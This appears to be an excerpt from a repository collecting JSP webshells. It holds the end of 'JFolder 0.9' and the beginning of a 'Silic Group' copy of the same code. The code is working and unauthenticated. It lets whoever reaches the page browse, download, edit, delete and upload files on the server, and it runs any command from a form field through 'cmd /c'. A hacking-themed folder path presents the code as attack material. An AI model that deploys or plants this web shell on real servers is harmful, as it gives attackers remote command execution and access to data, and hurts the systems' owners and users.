if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 "+strPath+"<p>");
sbSaveCopy.append("目标文件 "+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("确定要删除文件 "+file+" 吗?"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>JFoler 0.9 ---A jsp based web folder management tool by Steven Cee</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; 未完成
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p>一、功能说明</p>
<p>&nbsp;&nbsp;&nbsp; jsp 版本的文件管理器,通过该程序可以远程管理服务器上的文件系统,您可以新建、修改、</p>
<p>删除、下载文件和目录。对于windows系统还提供了命令行窗口的功能可以运行一些程序类似</p>
<p>与windows的cmd。</p>
<p>&nbsp;</p>
<p>二、测试</p>
<p>&nbsp;&nbsp;&nbsp;<b>请大家在使用过程中,有任何问题,意见或者建议都可以给我留言,以便使这个程序更加完善和稳定,<p>
留言地址为:<a href="http://blog.csdn.net/cqq/archive/2004/11/14/181728.aspx" target="_blank">http://blog.csdn.net/cqq/archive/2004/11/14/181728.aspx</a></b>
<p>&nbsp;</p>
<p>三、更新记录</p>
<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9测试版发布,增加了一些基本的功能,文件编辑、复制、删除、下载、上传以及新建文件目录功能</p>
<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; 暂时定为0.6版吧, 提供了目录文件浏览功能 和 cmd功能</p>
<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; 第一个jsp&nbsp;程序就是这个简单的显示目录文件的小程序</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+" <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
总计文件个数:<font color="#FF0000">30</font> ,大小:<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="上传">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center><a href="http://www.topronet.com" target="_blank">www.topronet.com</a> ,All Rights Reserved.
<br>Any question, please email me cqq1978@Gmail.com

844
jsp/hackk8/fuck-jsp/silic webshell.jsp Normal file
View file

@ -0,0 +1,844 @@
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0;
String strThisFile="JFolder.jsp";
String[] authorInfo={"<font color=red>Silic Group</font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"系 统 属 性","System Property"};
String[] strHelp = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
}
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 "+strPath+"<p>");
sbSaveCopy.append("目标文件 "+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
